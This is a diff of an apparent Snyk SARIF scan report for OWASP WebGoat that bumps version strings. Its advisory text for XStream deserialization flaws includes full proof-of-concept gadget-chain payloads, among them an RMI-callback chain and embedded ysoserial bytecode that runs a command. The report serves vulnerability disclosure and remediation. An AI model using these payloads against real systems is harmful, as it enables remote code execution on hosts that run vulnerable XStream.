               "properties": {
-                "tags": [
-                  "security",
-                  "CWE-502",
-                  "maven"
-                ],
+                "tags": ["security", "CWE-502", "maven"],
                 "cvssv3_baseScore": 5.3,
                 "security-severity": "5.3"
               }
@@ -552,14 +292,10 @@
               },
               "help": {
                 "text": "",
-                "markdown": "* Package Manager: maven\n* Vulnerable module: com.thoughtworks.xstream:xstream\n* Introduced through: org.owasp.webgoat:webgoat@2023.5-SNAPSHOT and com.thoughtworks.xstream:xstream@1.4.5\n### Detailed paths\n* _Introduced through_: org.owasp.webgoat:webgoat@2023.5-SNAPSHOT › com.thoughtworks.xstream:xstream@1.4.5\n# Overview\n[com.thoughtworks.xstream:xstream](https://x-stream.github.io/) is a simple library to serialize objects to XML and back again.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. A remote attacker that has sufficient rights may execute commands of the host by only manipulating the processed input stream.\r\n\r\n## PoC\r\n```\r\n<!-- Create a simple PriorityQueue and use XStream to marshal it to XML. Replace the XML with following snippet and unmarshal it again with XStream: -->\r\n\r\n<java.util.PriorityQueue serialization='custom'>\r\n  <unserializable-parents/>\r\n  <java.util.PriorityQueue>\r\n    <default>\r\n      <size>2</size>\r\n    </default>\r\n    <int>3</int>\r\n    <javax.naming.ldap.Rdn_-RdnEntry>\r\n      <type>12345</type>\r\n      <value class='com.sun.org.apache.xpath.internal.objects.XString'>\r\n        <m__obj class='string'>com.sun.xml.internal.ws.api.message.Packet@2002fc1d Content: <none></m__obj>\r\n      </value>\r\n    </javax.naming.ldap.Rdn_-RdnEntry>\r\n    <javax.naming.ldap.Rdn_-RdnEntry>\r\n      <type>12345</type>\r\n      <value class='com.sun.xml.internal.ws.api.message.Packet' serialization='custom'>\r\n        <message class='com.sun.xml.internal.ws.message.saaj.SAAJMessage'>\r\n          <parsedMessage>true</parsedMessage>\r\n          <soapVersion>SOAP_11</soapVersion>\r\n          <bodyParts/>\r\n          <sm class='com.sun.xml.internal.messaging.saaj.soap.ver1_1.Message1_1Impl'>\r\n            <attachmentsInitialized>false</attachmentsInitialized>\r\n            <multiPart class='com.sun.xml.internal.messaging.saaj.soap.ver1_1.Message1_1Impl'>\r\n              <soapPart/>\r\n              <mm>\r\n                <it class='com.sun.org.apache.xml.internal.security.keys.storage.implementations.KeyStoreResolver$KeyStoreIterator'>\r\n                  <aliases class='com.sun.jndi.toolkit.dir.LazySearchEnumerationImpl'>\r\n                    <candidates class='com.sun.jndi.rmi.registry.BindingEnumeration'>\r\n                      <names>\r\n                        <string>aa</string>\r\n                        <string>aa</string>\r\n                      </names>\r\n                      <ctx>\r\n                        <environment/>\r\n                        <registry class='sun.rmi.registry.RegistryImpl_Stub' serialization='custom'>\r\n                          <java.rmi.server.RemoteObject>\r\n                            <string>UnicastRef</string>\r\n                            <string>ip2</string>\r\n                            <int>1099</int>\r\n                            <long>0</long>\r\n                            <int>0</int>\r\n                            <short>0</short>\r\n                            <boolean>false</boolean>\r\n                          </java.rmi.server.RemoteObject>\r\n                        </registry>\r\n                        <host>ip2</host>\r\n                        <port>1099</port>\r\n                      </ctx>\r\n                    </candidates>\r\n                  </aliases>\r\n                </it>\r\n              </mm>\r\n            </multiPart>\r\n          </sm>\r\n        </message>\r\n      </value>\r\n    </javax.naming.ldap.Rdn_-RdnEntry>\r\n  </java.util.PriorityQueue>\r\n</java.util.PriorityQueue>\r\n```\r\n\r\nUsers who follow [the recommendation](https://x-stream.github.io/security.html#workaround) to setup XStream's security framework with a whitelist limited to the minimal required types are not affected.\n\n# Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating object from sequence of bytes is called deserialization. Serialization is commonly used for communication (sharing objects between multiple hosts) and persistence (store the object state in a file or a database). It is an integral part of popular protocols like _Remote Method Invocation (RMI)_, _Java Management Extension (JMX)_, _Java Messaging System (JMS)_, _Action Message Format (AMF)_, _Java Server Faces (JSF) ViewState_, etc.\n\n_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)), is when the application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, letting the attacker to control the state or the flow of the execution.\n\nJava deserialization issues have been known for years. However, interest in the issue intensified greatly in 2015, when classes that could be abused to achieve remote code execution were found in a [popular library (Apache Commons Collection)](https://snyk.io/vuln/SNYK-JAVA-COMMONSCOLLECTIONS-30078). These classes were used in zero-days affecting IBM WebSphere, Oracle WebLogic and many other products.\n\n  \nAn attacker just needs to identify a piece of software that has both a vulnerable class on its path, and performs deserialization on untrusted data. Then all they need to do is send the payload into the deserializer, getting the command executed.\n  \n\n> Developers put too much trust in Java Object Serialization. Some even de-serialize objects pre-authentication. When deserializing an Object i"
+                "markdown": "* Package Manager: maven\n* Vulnerable module: com.thoughtworks.xstream:xstream\n* Introduced through: org.owasp.webgoat:webgoat@2025.4-SNAPSHOT and com.thoughtworks.xstream:xstream@1.4.5\n### Detailed paths\n* _Introduced through_: org.owasp.webgoat:webgoat@2025.4-SNAPSHOT › com.thoughtworks.xstream:xstream@1.4.5\n# Overview\n[com.thoughtworks.xstream:xstream](https://x-stream.github.io/) is a simple library to serialize objects to XML and back again.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. A remote attacker that has sufficient rights may execute commands of the host by only manipulating the processed input stream.\r\n\r\n## PoC\r\n```\r\n<!-- Create a simple PriorityQueue and use XStream to marshal it to XML. Replace the XML with following snippet and unmarshal it again with XStream: -->\r\n\r\n<java.util.PriorityQueue serialization='custom'>\r\n  <unserializable-parents/>\r\n  <java.util.PriorityQueue>\r\n    <default>\r\n      <size>2</size>\r\n    </default>\r\n    <int>3</int>\r\n    <javax.naming.ldap.Rdn_-RdnEntry>\r\n      <type>12345</type>\r\n      <value class='com.sun.org.apache.xpath.internal.objects.XString'>\r\n        <m__obj class='string'>com.sun.xml.internal.ws.api.message.Packet@2002fc1d Content: <none></m__obj>\r\n      </value>\r\n    </javax.naming.ldap.Rdn_-RdnEntry>\r\n    <javax.naming.ldap.Rdn_-RdnEntry>\r\n      <type>12345</type>\r\n      <value class='com.sun.xml.internal.ws.api.message.Packet' serialization='custom'>\r\n        <message class='com.sun.xml.internal.ws.message.saaj.SAAJMessage'>\r\n          <parsedMessage>true</parsedMessage>\r\n          <soapVersion>SOAP_11</soapVersion>\r\n          <bodyParts/>\r\n          <sm class='com.sun.xml.internal.messaging.saaj.soap.ver1_1.Message1_1Impl'>\r\n            <attachmentsInitialized>false</attachmentsInitialized>\r\n            <multiPart class='com.sun.xml.internal.messaging.saaj.soap.ver1_1.Message1_1Impl'>\r\n              <soapPart/>\r\n              <mm>\r\n                <it class='com.sun.org.apache.xml.internal.security.keys.storage.implementations.KeyStoreResolver$KeyStoreIterator'>\r\n                  <aliases class='com.sun.jndi.toolkit.dir.LazySearchEnumerationImpl'>\r\n                    <candidates class='com.sun.jndi.rmi.registry.BindingEnumeration'>\r\n                      <names>\r\n                        <string>aa</string>\r\n                        <string>aa</string>\r\n                      </names>\r\n                      <ctx>\r\n                        <environment/>\r\n                        <registry class='sun.rmi.registry.RegistryImpl_Stub' serialization='custom'>\r\n                          <java.rmi.server.RemoteObject>\r\n                            <string>UnicastRef</string>\r\n                            <string>ip2</string>\r\n                            <int>1099</int>\r\n                            <long>0</long>\r\n                            <int>0</int>\r\n                            <short>0</short>\r\n                            <boolean>false</boolean>\r\n                          </java.rmi.server.RemoteObject>\r\n                        </registry>\r\n                        <host>ip2</host>\r\n                        <port>1099</port>\r\n                      </ctx>\r\n                    </candidates>\r\n                  </aliases>\r\n                </it>\r\n              </mm>\r\n            </multiPart>\r\n          </sm>\r\n        </message>\r\n      </value>\r\n    </javax.naming.ldap.Rdn_-RdnEntry>\r\n  </java.util.PriorityQueue>\r\n</java.util.PriorityQueue>\r\n```\r\n\r\nUsers who follow [the recommendation](https://x-stream.github.io/security.html#workaround) to setup XStream's security framework with a whitelist limited to the minimal required types are not affected.\n\n# Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating object from sequence of bytes is called deserialization. Serialization is commonly used for communication (sharing objects between multiple hosts) and persistence (store the object state in a file or a database). It is an integral part of popular protocols like _Remote Method Invocation (RMI)_, _Java Management Extension (JMX)_, _Java Messaging System (JMS)_, _Action Message Format (AMF)_, _Java Server Faces (JSF) ViewState_, etc.\n\n_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)), is when the application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, letting the attacker to control the state or the flow of the execution.\n\nJava deserialization issues have been known for years. However, interest in the issue intensified greatly in 2015, when classes that could be abused to achieve remote code execution were found in a [popular library (Apache Commons Collection)](https://snyk.io/vuln/SNYK-JAVA-COMMONSCOLLECTIONS-30078). These classes were used in zero-days affecting IBM WebSphere, Oracle WebLogic and many other products.\n\n  \nAn attacker just needs to identify a piece of software that has both a vulnerable class on its path, and performs deserialization on untrusted data. Then all they need to do is send the payload into the deserializer, getting the command executed.\n  \n\n> Developers put too much trust in Java Object Serialization. Some even de-serialize objects pre-authentication. When deserializing an Object in Java you typically cast it to an expected type, and therefore Java's strict type system will ensure you only get valid object trees. Unfortunately, by the time the type checking happens, platform code has already created and executed significant logic. So, before the final type is checked a lot of code is executed from the readObject() methods of various objects, all of which is out of the developer's control. By combining the readObject() methods of various classes which are available on the classpath of the vulnerable application, an attacker can execute functions (including calling Runtime.exec() to execute local OS commands).\n\n  \n# Remediation\nUpgrade `com.thoughtworks.xstream:xstream` to version 1.4.17 or higher.\n# References\n- [GitHub Commit](https://github.com/x-stream/xstream/commit/f0c4a8d861b68ffc3119cfbbbd632deee624e227)\n- [XStream Advisory](https://x-stream.github.io/CVE-2021-29505.html)\n- [Nuclei Templates](https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2021/CVE-2021-29505.yaml)\n"
               },
               "properties": {
-                "tags": [
-                  "security",
-                  "CWE-502",
-                  "maven"
-                ],
+                "tags": ["security", "CWE-502", "maven"],
                 "cvssv3_baseScore": 6.2,
                 "security-severity": "6.2"
               }
@@ -574,14 +310,10 @@
               },
               "help": {
                 "text": "",
-                "markdown": "* Package Manager: maven\n* Vulnerable module: com.thoughtworks.xstream:xstream\n* Introduced through: org.owasp.webgoat:webgoat@2023.5-SNAPSHOT and com.thoughtworks.xstream:xstream@1.4.5\n### Detailed paths\n* _Introduced through_: org.owasp.webgoat:webgoat@2023.5-SNAPSHOT › com.thoughtworks.xstream:xstream@1.4.5\n# Overview\n[com.thoughtworks.xstream:xstream](https://x-stream.github.io/) is a simple library to serialize objects to XML and back again.\n\nAffected versions of this package are vulnerable to Arbitrary Code Execution. This vulnerability may allow a remote attacker to load and execute arbitrary code from a remote host only by manipulating the processed input stream, if using the version out of the box with Java runtime version 14 to 8 or with JavaFX installed. No user is affected, who followed the recommendation to setup XStream's security framework with a whitelist limited to the minimal required types. XStream 1.4.18 uses no longer a blacklist by default, since it cannot be secured for general purpose.\r\n\r\n## PoC\r\n\r\n```\r\n<java.util.PriorityQueue serialization='custom'>\r\n  <unserializable-parents/>\r\n  <java.util.PriorityQueue>\r\n    <default>\r\n      <size>2</size>\r\n      <comparator class='com.sun.java.util.jar.pack.PackageWriter$2'>\r\n        <outer-class>\r\n          <verbose>0</verbose>\r\n          <effort>0</effort>\r\n          <optDumpBands>false</optDumpBands>\r\n          <optDebugBands>false</optDebugBands>\r\n          <optVaryCodings>false</optVaryCodings>\r\n          <optBigStrings>false</optBigStrings>\r\n          <isReader>false</isReader>\r\n          <bandHeaderBytePos>0</bandHeaderBytePos>\r\n          <bandHeaderBytePos0>0</bandHeaderBytePos0>\r\n          <archiveOptions>0</archiveOptions>\r\n          <archiveSize0>0</archiveSize0>\r\n          <archiveSize1>0</archiveSize1>\r\n          <archiveNextCount>0</archiveNextCount>\r\n          <attrClassFileVersionMask>0</attrClassFileVersionMask>\r\n          <attrIndexTable class='com.sun.javafx.fxml.BeanAdapter'>\r\n            <bean class='com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl' serialization='custom'>\r\n              <com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl>\r\n                <default>\r\n                  <__name>Pwnr</__name>\r\n                  <__bytecodes>\r\n                    <byte-array>yv66vgAAADIAOQoAAwAiBwA3BwAlBwAmAQAQc2VyaWFsVmVyc2lvblVJRAEAAUoBAA1Db25zdGFudFZhbHVlBa0gk/OR3e8+AQAGPGluaXQ+AQADKClWAQAEQ29kZQEAD0xpbmVOdW1iZXJUYWJsZQEAEkxvY2FsVmFyaWFibGVUYWJsZQEABHRoaXMBABNTdHViVHJhbnNsZXRQYXlsb2FkAQAMSW5uZXJDbGFzc2VzAQA1THlzb3NlcmlhbC9wYXlsb2Fkcy91dGlsL0dhZGdldHMkU3R1YlRyYW5zbGV0UGF5bG9hZDsBAAl0cmFuc2Zvcm0BAHIoTGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ET007W0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7KVYBAAhkb2N1bWVudAEALUxjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NOwEACGhhbmRsZXJzAQBCW0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7AQAKRXhjZXB0aW9ucwcAJwEApihMY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTtMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9kdG0vRFRNQXhpc0l0ZXJhdG9yO0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7KVYBAAhpdGVyYXRvcgEANUxjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL2R0bS9EVE1BeGlzSXRlcmF0b3I7AQAHaGFuZGxlcgEAQUxjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7AQAKU291cmNlRmlsZQEADEdhZGdldHMuamF2YQwACgALBwAoAQAzeXNvc2VyaWFsL3BheWxvYWRzL3V0aWwvR2FkZ2V0cyRTdHViVHJhbnNsZXRQYXlsb2FkAQBAY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL3J1bnRpbWUvQWJzdHJhY3RUcmFuc2xldAEAFGphdmEvaW8vU2VyaWFsaXphYmxlAQA5Y29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL1RyYW5zbGV0RXhjZXB0aW9uAQAfeXNvc2VyaWFsL3BheWxvYWRzL3V0aWwvR2FkZ2V0cwEACDxjbGluaXQ+AQARamF2YS9sYW5nL1J1bnRpbWUHACoBAApnZXRSdW50aW1lAQAVKClMamF2YS9sYW5nL1J1bnRpbWU7DAAsAC0KACsALgEAKG9wZW4gL1N5c3RlbS9BcHBsaWNhdGlvbnMvQ2FsY3VsYXRvci5hcHAIADABAARleGVjAQAnKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL1Byb2Nlc3M7DAAyADMKACsANAEADVN0YWNrTWFwVGFibGUBAB55c29zZXJpYWwvUHduZXIyMDU0MTY0NDMxMDIwMTkBACBMeXNvc2VyaWFsL1B3bmVyMjA1NDE2NDQzMTAyMDE5OwAhAAIAAwABAAQAAQAaAAUABgABAAcAAAACAAgABAABAAoACwABAAwAAAAvAAEAAQAAAAUqtwABsQAAAAIADQAAAAYAAQAAAC8ADgAAAAwAAQAAAAUADwA4AAAAAQATABQAAgAMAAAAPwAAAAMAAAABsQAAAAIADQAAAAYAAQAAADQADgAAACAAAwAAAAEADwA4AAAAAAABABUAFgABAAAAAQAXABgAAgAZAAAABAABABoAAQATABsAAgAMAAAASQAAAAQAAAABsQAAAAIADQAAAAYAAQAAADgADgAAACoABAAAAAEADwA4AAAAAAABABUAFgABAAAAAQAcAB0AAgAAAAEAHgAfAAMAGQAAAAQAAQAaAAgAKQALAAEADAAAACQAAwACAAAAD6cAAwFMuAAvEjG2ADVXsQAAAAEANgAAAAMAAQMAAgAgAAAAAgAhABEAAAAKAAEAAgAjABAACQ==</byte-array>\r\n                    <byte-array>yv66vgAAADIAGwoAAwAVBwAXBwAYBwAZAQAQc2VyaWFsVmVyc2lvblVJRAEAAUoBAA1Db25zdGFudFZhbHVlBXHmae48bUcYAQAGPGluaXQ+AQADKClWAQAEQ29kZQEAD0xpbmVOdW1iZXJUYWJsZQEAEkxvY2FsVmFyaWFibGVUYWJsZQEABHRoaXMBAANGb28BAAxJbm5lckNsYXNzZXMBACVMeXNvc2VyaWFsL3BheWxvYWRzL3V0aWwvR2FkZ2V0cyRGb287AQAKU291cmNlRmlsZQEADEdhZGdldHMuamF2YQwACgALBwAaAQAjeXNvc2VyaWFsL3BheWxvYWRzL3V0aWwvR2FkZ2V0cyRGb28BABBqYXZhL2xhbmcvT2JqZWN0AQAUamF2YS9pby9TZXJpYWxpemFibGUBAB95c29zZXJpYWwvcGF5bG9hZHMvdXRpbC9HYWRnZXRzACEAAgADAAEABAABABoABQAGAAEABwAAAAIACAABAAEACgALAAEADAAAAC8AAQABAAAABSq3AAGxAAAAAgANAAAABgABAAAAPAAOAAAADAABAAAABQAPABIAAAACABMAAAACABQAEQAAAAoAAQACABYAEAAJ</byte-array>\r\n                  </__bytecodes>\r\n                  <__transletIndex>-1</__transletIndex>\r\n                  <__indentNumber>0<"
+                "markdown": "* Package Manager: maven\n* Vulnerable module: com.thoughtworks.xstream:xstream\n* Introduced through: org.owasp.webgoat:webgoat@2025.4-SNAPSHOT and com.thoughtworks.xstream:xstream@1.4.5\n### Detailed paths\n* _Introduced through_: org.owasp.webgoat:webgoat@2025.4-SNAPSHOT › com.thoughtworks.xstream:xstream@1.4.5\n# Overview\n[com.thoughtworks.xstream:xstream](https://x-stream.github.io/) is a simple library to serialize objects to XML and back again.\n\nAffected versions of this package are vulnerable to Arbitrary Code Execution. This vulnerability may allow a remote attacker to load and execute arbitrary code from a remote host only by manipulating the processed input stream, if using the version out of the box with Java runtime version 14 to 8 or with JavaFX installed. No user is affected, who followed the recommendation to setup XStream's security framework with a whitelist limited to the minimal required types. XStream 1.4.18 uses no longer a blacklist by default, since it cannot be secured for general purpose.\r\n\r\n## PoC\r\n\r\n```\r\n<java.util.PriorityQueue serialization='custom'>\r\n  <unserializable-parents/>\r\n  <java.util.PriorityQueue>\r\n    <default>\r\n      <size>2</size>\r\n      <comparator class='com.sun.java.util.jar.pack.PackageWriter$2'>\r\n        <outer-class>\r\n          <verbose>0</verbose>\r\n          <effort>0</effort>\r\n          <optDumpBands>false</optDumpBands>\r\n          <optDebugBands>false</optDebugBands>\r\n          <optVaryCodings>false</optVaryCodings>\r\n          <optBigStrings>false</optBigStrings>\r\n          <isReader>false</isReader>\r\n          <bandHeaderBytePos>0</bandHeaderBytePos>\r\n          <bandHeaderBytePos0>0</bandHeaderBytePos0>\r\n          <archiveOptions>0</archiveOptions>\r\n          <archiveSize0>0</archiveSize0>\r\n          <archiveSize1>0</archiveSize1>\r\n          <archiveNextCount>0</archiveNextCount>\r\n          <attrClassFileVersionMask>0</attrClassFileVersionMask>\r\n          <attrIndexTable class='com.sun.javafx.fxml.BeanAdapter'>\r\n            <bean class='com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl' serialization='custom'>\r\n              <com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl>\r\n                <default>\r\n                  <__name>Pwnr</__name>\r\n                  <__bytecodes>\r\n                    <byte-array>yv66vgAAADIAOQoAAwAiBwA3BwAlBwAmAQAQc2VyaWFsVmVyc2lvblVJRAEAAUoBAA1Db25zdGFudFZhbHVlBa0gk/OR3e8+AQAGPGluaXQ+AQADKClWAQAEQ29kZQEAD0xpbmVOdW1iZXJUYWJsZQEAEkxvY2FsVmFyaWFibGVUYWJsZQEABHRoaXMBABNTdHViVHJhbnNsZXRQYXlsb2FkAQAMSW5uZXJDbGFzc2VzAQA1THlzb3NlcmlhbC9wYXlsb2Fkcy91dGlsL0dhZGdldHMkU3R1YlRyYW5zbGV0UGF5bG9hZDsBAAl0cmFuc2Zvcm0BAHIoTGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ET007W0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7KVYBAAhkb2N1bWVudAEALUxjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NOwEACGhhbmRsZXJzAQBCW0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7AQAKRXhjZXB0aW9ucwcAJwEApihMY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTtMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9kdG0vRFRNQXhpc0l0ZXJhdG9yO0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7KVYBAAhpdGVyYXRvcgEANUxjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL2R0bS9EVE1BeGlzSXRlcmF0b3I7AQAHaGFuZGxlcgEAQUxjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7AQAKU291cmNlRmlsZQEADEdhZGdldHMuamF2YQwACgALBwAoAQAzeXNvc2VyaWFsL3BheWxvYWRzL3V0aWwvR2FkZ2V0cyRTdHViVHJhbnNsZXRQYXlsb2FkAQBAY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL3J1bnRpbWUvQWJzdHJhY3RUcmFuc2xldAEAFGphdmEvaW8vU2VyaWFsaXphYmxlAQA5Y29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL1RyYW5zbGV0RXhjZXB0aW9uAQAfeXNvc2VyaWFsL3BheWxvYWRzL3V0aWwvR2FkZ2V0cwEACDxjbGluaXQ+AQARamF2YS9sYW5nL1J1bnRpbWUHACoBAApnZXRSdW50aW1lAQAVKClMamF2YS9sYW5nL1J1bnRpbWU7DAAsAC0KACsALgEAKG9wZW4gL1N5c3RlbS9BcHBsaWNhdGlvbnMvQ2FsY3VsYXRvci5hcHAIADABAARleGVjAQAnKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL1Byb2Nlc3M7DAAyADMKACsANAEADVN0YWNrTWFwVGFibGUBAB55c29zZXJpYWwvUHduZXIyMDU0MTY0NDMxMDIwMTkBACBMeXNvc2VyaWFsL1B3bmVyMjA1NDE2NDQzMTAyMDE5OwAhAAIAAwABAAQAAQAaAAUABgABAAcAAAACAAgABAABAAoACwABAAwAAAAvAAEAAQAAAAUqtwABsQAAAAIADQAAAAYAAQAAAC8ADgAAAAwAAQAAAAUADwA4AAAAAQATABQAAgAMAAAAPwAAAAMAAAABsQAAAAIADQAAAAYAAQAAADQADgAAACAAAwAAAAEADwA4AAAAAAABABUAFgABAAAAAQAXABgAAgAZAAAABAABABoAAQATABsAAgAMAAAASQAAAAQAAAABsQAAAAIADQAAAAYAAQAAADgADgAAACoABAAAAAEADwA4AAAAAAABABUAFgABAAAAAQAcAB0AAgAAAAEAHgAfAAMAGQAAAAQAAQAaAAgAKQALAAEADAAAACQAAwACAAAAD6cAAwFMuAAvEjG2ADVXsQAAAAEANgAAAAMAAQMAAgAgAAAAAgAhABEAAAAKAAEAAgAjABAACQ==</byte-array>\r\n                    <byte-array>yv66vgAAADIAGwoAAwAVBwAXBwAYBwAZAQAQc2VyaWFsVmVyc2lvblVJRAEAAUoBAA1Db25zdGFudFZhbHVlBXHmae48bUcYAQAGPGluaXQ+AQADKClWAQAEQ29kZQEAD0xpbmVOdW1iZXJUYWJsZQEAEkxvY2FsVmFyaWFibGVUYWJsZQEABHRoaXMBAANGb28BAAxJbm5lckNsYXNzZXMBACVMeXNvc2VyaWFsL3BheWxvYWRzL3V0aWwvR2FkZ2V0cyRGb287AQAKU291cmNlRmlsZQEADEdhZGdldHMuamF2YQwACgALBwAaAQAjeXNvc2VyaWFsL3BheWxvYWRzL3V0aWwvR2FkZ2V0cyRGb28BABBqYXZhL2xhbmcvT2JqZWN0AQAUamF2YS9pby9TZXJpYWxpemFibGUBAB95c29zZXJpYWwvcGF5bG9hZHMvdXRpbC9HYWRnZXRzACEAAgADAAEABAABABoABQAGAAEABwAAAAIACAABAAEACgALAAEADAAAAC8AAQABAAAABSq3AAGxAAAAAgANAAAABgABAAAAPAAOAAAADAABAAAABQAPABIAAAACABMAAAACABQAEQAAAAoAAQACABYAEAAJ</byte-array>\r\n                  </__bytecodes>\r\n                  <__transletIndex>-1</__transletIndex>\r\n                  <__indentNumber>0</__indentNumber>\r\n                </default>\r\n              </com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl>\r\n            </bean>\r\n            <localCache>\r\n              <methods>\r\n                <entry>\r\n                  <string>getOutputProperties</string>\r\n                  <list>\r\n                    <method>\r\n                      <class>com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl</class>\r\n                      <name>getOutputProperties</name>\r\n                      <parameter-types/>\r\n                    </method>\r\n                  </list>\r\n                </entry>\r\n              </methods>\r\n            </localCache>\r\n          </attrIndexTable>\r\n          <shortCodeHeader__h__limit>0</shortCodeHeader__h__limit>\r\n        </outer-class>\r\n      </comparator>\r\n    </default>\r\n    <int>3</int>\r\n    <string-array>\r\n      <string>yxxx</string>\r\n      <string>outputProperties</string>\r\n    </string-array>\r\n    <string-array>\r\n      <string>yxxx</string>\r\n    </string-array>\r\n  </java.util.PriorityQueue>\r\n</java.util.PriorityQueue>\r\n```\r\n\r\n```\r\nXStream xstream = new XStream();\r\nxstream.fromXML(xml);\r\n```\n# Remediation\nUpgrade `com.thoughtworks.xstream:xstream` to version 1.4.18 or higher.\n# References\n- [XStream Advisory](https://x-stream.github.io/CVE-2021-39153.html)\n- [XStream Changelog](https://x-stream.github.io/changes.html#1.4.18)\n"
               },
               "properties": {
-                "tags": [
-                  "security",
-                  "CWE-434",
-                  "maven"
-                ],
+                "tags": ["security", "CWE-434", "maven"],
                 "cvssv3_baseScore": 8.5,
                 "security-severity": "8.5"
               }
@@ -596,14 +328,10 @@
               },
               "help": {
                 "text": "",
-                "markdown": "* Package Manager: maven\n* Vulnerable module: com.thoughtworks.xstream:xstream\n* Introduced through: org.owasp.webgoat:webgoat@2023.5-SNAPSHOT and com.thoughtworks.xstream:xstream@1.4.5\n### Detailed paths\n* _Introduced through_: org.owasp.webgoat:webgoat@2023.5-SNAPSHOT › com.thoughtworks.xstream:xstream@1.4.5\n# Overview\n[com.thoughtworks.xstream:xstream](https://x-stream.github.io/) is a simple library to serialize objects to XML and back again.\n\nAffected versions of this package are vulnerable to Arbitrary Code Execution. This vulnerability may allow a remote attacker to load and execute arbitrary code from a remote host only by manipulating the processed input stream. No user is affected, who followed the recommendation to setup XStream's security framework with a whitelist limited to the minimal required types. XStream 1.4.18 uses no longer a blacklist by default, since it cannot be secured for general purpose.\r\n\r\n## PoC\r\n\r\n```\r\n<java.util.PriorityQueue serialization='custom'>\r\n  <unserializable-parents/>\r\n  <java.util.PriorityQueue>\r\n    <default>\r\n      <size>2</size>\r\n    </default>\r\n    <int>3</int>\r\n    <dynamic-proxy>\r\n      <interface>java.lang.Comparable</interface>\r\n      <handler class='com.sun.xml.internal.ws.client.sei.SEIStub'>\r\n        <owner/>\r\n        <managedObjectManagerClosed>false</managedObjectManagerClosed>\r\n        <databinding class='com.sun.xml.internal.ws.db.DatabindingImpl'>\r\n          <stubHandlers>\r\n            <entry>\r\n              <method>\r\n                <class>java.lang.Comparable</class>\r\n                <name>compareTo</name>\r\n                <parameter-types>\r\n                  <class>java.lang.Object</class>\r\n                </parameter-types>\r\n              </method>\r\n              <com.sun.xml.internal.ws.client.sei.StubHandler>\r\n                <bodyBuilder class='com.sun.xml.internal.ws.client.sei.BodyBuilder$DocLit'>\r\n                  <indices>\r\n                    <int>0</int>\r\n                  </indices>\r\n                  <getters>\r\n                    <com.sun.xml.internal.ws.client.sei.ValueGetter>PLAIN</com.sun.xml.internal.ws.client.sei.ValueGetter>\r\n                  </getters>\r\n                  <accessors>\r\n                    <com.sun.xml.internal.ws.spi.db.JAXBWrapperAccessor_-2>\r\n                      <val_-isJAXBElement>false</val_-isJAXBElement>\r\n                      <val_-getter class='com.sun.xml.internal.ws.spi.db.FieldGetter'>\r\n                        <type>int</type>\r\n                        <field>\r\n                          <name>hash</name>\r\n                          <clazz>java.lang.String</clazz>\r\n                        </field>\r\n                      </val_-getter>\r\n                      <val_-isListType>false</val_-isListType>\r\n                      <val_-n>\r\n                        <namespaceURI/>\r\n                        <localPart>hash</localPart>\r\n                        <prefix/>\r\n                      </val_-n>\r\n                      <val_-setter class='com.sun.xml.internal.ws.spi.db.MethodSetter'>\r\n                        <type>java.lang.String</type>\r\n                        <method>\r\n                          